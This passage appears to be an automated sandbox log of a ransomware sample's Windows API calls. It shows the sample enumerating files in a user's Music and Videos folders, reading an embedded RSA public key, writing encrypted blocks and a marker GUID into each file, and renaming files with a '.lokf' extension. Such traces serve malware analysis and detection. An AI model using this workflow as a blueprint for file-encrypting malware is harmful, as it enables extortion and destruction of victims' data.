lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ed8 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ea8 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ef0 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ec0 | out: hHeap=0x660000) returned 1 [0060.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ec0 [0060.544] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.544] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.544] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.544] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.544] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.544] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ec0 | out: hHeap=0x660000) returned 1 [0060.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.544] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11c02, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.544] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.545] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.545] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.545] CloseHandle (hObject=0x5cc) returned 1 [0060.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0060.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.546] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\Z-23Z6qoTq8B67.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\z-23z6qotq8b67.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\Z-23Z6qoTq8B67.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\z-23z6qotq8b67.m4a.lokf")) returned 1 [0060.548] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ad04f0, ftCreationTime.dwHighDateTime=0x1d4c82e, ftLastAccessTime.dwLowDateTime=0xe5430050, ftLastAccessTime.dwHighDateTime=0x1d4d42c, ftLastWriteTime.dwLowDateTime=0xe5430050, ftLastWriteTime.dwHighDateTime=0x1d4d42c, nFileSizeHigh=0x0, nFileSizeLow=0x11c02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z-23Z6qoTq8B67.m4a", cAlternateFileName="Z-23Z6~1.M4A")) returned 0 [0060.548] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.548] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.548] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.548] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\") returned="m Cm9nOn1JJtRb93m\\" [0060.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0060.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.548] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\") returned="27nF\\" [0060.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0060.548] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0060.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c895b0 [0060.548] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.548] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.548] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.549] PathFindFileNameW (pszPath="") returned="" [0060.549] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.549] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3b2a300, ftCreationTime.dwHighDateTime=0x1d4cba5, ftLastAccessTime.dwLowDateTime=0xf06cb5f0, ftLastAccessTime.dwHighDateTime=0x1d4cfba, ftLastWriteTime.dwLowDateTime=0xf06cb5f0, ftLastWriteTime.dwHighDateTime=0x1d4cfba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.549] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3b2a300, ftCreationTime.dwHighDateTime=0x1d4cba5, ftLastAccessTime.dwLowDateTime=0xf06cb5f0, ftLastAccessTime.dwHighDateTime=0x1d4cfba, ftLastWriteTime.dwLowDateTime=0xf06cb5f0, ftLastWriteTime.dwHighDateTime=0x1d4cfba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.549] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf996600, ftCreationTime.dwHighDateTime=0x1d4c9fe, ftLastAccessTime.dwLowDateTime=0x89aea880, ftLastAccessTime.dwHighDateTime=0x1d4d3ea, ftLastWriteTime.dwLowDateTime=0x89aea880, ftLastWriteTime.dwHighDateTime=0x1d4d3ea, nFileSizeHigh=0x0, nFileSizeLow=0xf554, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0BW0y.mkv", cAlternateFileName="")) returned 1 [0060.549] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.549] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.549] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\0BW0y.mkv") returned=".mkv" [0060.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\0BW0y.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\0bw0y.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.549] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=62804) returned 1 [0060.549] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.552] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf52e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.552] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.552] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.553] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xf554, lpOverlapped=0x0) returned 1 [0060.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.553] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.553] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.554] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.554] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.554] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.554] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.554] GetLastError () returned 0x0 [0060.554] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.554] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.554] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.554] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.554] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.554] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.554] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf550) returned 0x9c8bae8 [0060.554] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c895b0 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e90 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c895f8 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ea8 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ed8 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ef0 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.555] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ed8 | out: hHeap=0x660000) returned 1 [0060.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ef0 | out: hHeap=0x660000) returned 1 [0060.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ef0 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85ed8 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ef0 | out: hHeap=0x660000) returned 1 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ed8 | out: hHeap=0x660000) returned 1 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.556] GetCurrentThreadId () returned 0x9e0 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8afd0 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.556] GetCurrentThreadId () returned 0x9e0 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.557] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf554, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.557] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0060.557] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.557] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.557] CloseHandle (hObject=0x5cc) returned 1 [0060.559] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\0BW0y.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\0bw0y.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\0BW0y.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\0bw0y.mkv.lokf")) returned 1 [0060.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.559] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 